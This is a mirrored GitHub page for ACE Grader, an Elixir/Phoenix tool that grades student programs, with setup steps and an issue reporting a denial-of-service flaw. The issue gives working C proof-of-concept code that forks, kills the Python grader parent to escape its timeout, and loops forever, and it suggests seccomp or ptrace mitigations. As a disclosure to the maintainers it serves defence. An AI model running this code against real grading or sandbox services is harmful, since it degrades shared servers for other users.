Giter VIP home page Giter VIP logo

ace_grader's Introduction

ACE Grader

Automatic Code Evaluator and Grader

ACE Grader was developed as part of my Master's Dissertation in Software Engineering at Universidade do Minho. I was supervised by Professor Pedro Rangel Henriques and Professor Alda Gancarski.

What is ACE Grader?

ACE Grader, as the name implies, is an automatic grading solution for programming exercises! It uses a combination of dynamic and static analysis in order to evaluate submitted programs.

What is static analysis?

Unlike dynamic analysis, which only looks at a program's output, static analysis looks at the program itself. For example, ACE Grader can check if a function is recursive, unlike most automatic grading software. This can be extremely useful for grading introductory programming exercises, where students must use a specific concept in order to solve a problem.

To start your Phoenix server:

  • Install dependencies with mix deps.get
  • Create and migrate your database with mix ecto.setup
  • Start Phoenix endpoint with mix phx.server or inside IEx with iex -S mix phx.server

Now you can visit localhost:4000 from your browser.

Ready to run in production? Please check our deployment guides.

Learn more

ace_grader's People

Contributors

risingfisan avatar

Stargazers

Matt Lambie avatar avatar Rui Lopes avatar

Watchers

avatar

ace_grader's Issues

DoS exploit

Vulnerability description

In grader.py, the user code is ran with a timeout of 5 seconds:

result = subprocess.run(['./main'], input=test_input.encode(), capture_output=True, timeout=5, check=True)

However, in *NIX systems, if a process kills its parent, it'll become orphaned, and will be adopted by the init system (systemd, openrc, ...). In that case, the timeout becomes meaningless (as Python, now dead, can no longer kill its child), and the program keeps running forever.

If the program, after killing its parent, started running a stress test, it'd be detrimental for server performance, and the server could be unable to accept requests from other users.

Example code

The following example uses the helloworld problem to run the exploit, but any other problem would be suitable for doing so:

#include <stdio.h>
#include <stdlib.h>

#include <signal.h>
#include <unistd.h>

void helloworld() {
	/*
	 * Fork before killing the parent. If the parent (Python?) were
	 * directly killed, the front-end reports an Internet connection error,
	 * and nothing is actually run.
	 */
	pid_t fork_result = fork();
	if (fork_result == 0) {
		/* Child process kills the parent and gets orphaned. */
		pid_t parent = getppid();
		kill(parent, SIGKILL);

		/*
		 * Insert stress test here. This examples only writes to
		 * /tmp/exploit periodically, to show that the process can keep
		 * running forever.
	     	 */
		for (int i = 0;; ++i) {
			FILE *f = fopen("/tmp/exploit", "w");
			fprintf(f, "%d\n", i);
			fclose(f);
			sleep(5);
		}
	}
}

In this example, to assert that the process is running forever, the following code can be submitted:

#include <stdlib.h>

void helloworld() {
	system("cat /tmp/exploit"); /* Simpler than reading a file in C :-) */
}

The number of 5 second intervals since the program started running will be shown as a wrong answer.

Mitigations

There are likely easier ways to stop a process from killing its parent, but here are the ones that come to mind:

  • Using secccomp BPF, to filter the syscalls that a process can use;

  • Using ptrace to intercept (and, in this case, block), certain syscalls, as is done in this article.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.